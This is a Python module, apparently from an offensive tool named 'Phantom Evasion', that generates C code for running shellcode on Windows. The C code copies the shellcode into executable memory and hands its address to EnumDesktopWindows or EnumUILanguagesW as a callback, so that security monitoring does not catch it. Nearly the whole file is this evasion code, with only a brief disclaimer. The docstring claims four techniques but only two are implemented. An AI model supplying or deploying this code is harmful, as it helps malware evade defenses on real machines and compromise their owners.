"""
Phantom Evasion - Callback-Based Shellcode Execution

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_callback_injection() -> Dict[str, Any]:
    """Generate C code that executes shellcode via Windows enumeration callbacks.

    Several Win32 enumeration APIs accept a callback function pointer.  When
    the API is called it invokes the callback in the context of the calling
    thread. By passing a pointer to shellcode (or a ROP stub) as the callback,
    execution is transferred without calling ``CreateThread`` or any obviously
    suspicious API.

    Techniques included:
        - ``EnumDesktopWindows`` / ``EnumWindows``
        - ``EnumChildWindows``
        - ``EnumUILanguages``
        - ``CopyFileExW`` (progress routine)

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Callback-Based Shellcode Execution – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Executes shellcode by passing it as a callback to legitimate Win32 APIs.

#include <windows.h>

// ── Method 1: EnumDesktopWindows callback ────────────────────────────────────
static BOOL CALLBACK _enum_desktop_cb(HWND hwnd, LPARAM lp) {
    (void)hwnd;
    // The 'lp' parameter holds the shellcode pointer
    ((void(*)(void))lp)();
    return FALSE;  // Stop enumeration after first callback
}

static BOOL execute_via_enum_desktop(unsigned char *shellcode, size_t len) {
    LPVOID exec_mem = VirtualAlloc(NULL, len,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    if (!exec_mem) return FALSE;
    memcpy(exec_mem, shellcode, len);
    EnumDesktopWindows(NULL, _enum_desktop_cb, (LPARAM)exec_mem);
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return TRUE;
}

// ── Method 2: EnumUILanguages callback ───────────────────────────────────────
static BOOL CALLBACK _enum_uilang_cb(LPWSTR lang, LONG_PTR lp) {
    (void)lang;
    ((void(*)(void))lp)();
    return FALSE;
}

static BOOL execute_via_enum_uilang(unsigned char *shellcode, size_t len) {
    LPVOID exec_mem = VirtualAlloc(NULL, len,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    if (!exec_mem) return FALSE;
    memcpy(exec_mem, shellcode, len);
    EnumUILanguagesW(_enum_uilang_cb, MUI_LANGUAGE_NAME, (LONG_PTR)exec_mem);
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return TRUE;
}

// ── Dispatcher: try each method in sequence ──────────────────────────────────
static BOOL callback_execute(unsigned char *shellcode, size_t shellcode_len) {
    if (execute_via_enum_desktop(shellcode, shellcode_len)) return TRUE;
    if (execute_via_enum_uilang(shellcode, shellcode_len))  return TRUE;
    return FALSE;
}
"""

    return {
        "code": code,
        "description": "Callback injection via EnumDesktopWindows / EnumUILanguages",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "callback_injection",
    }
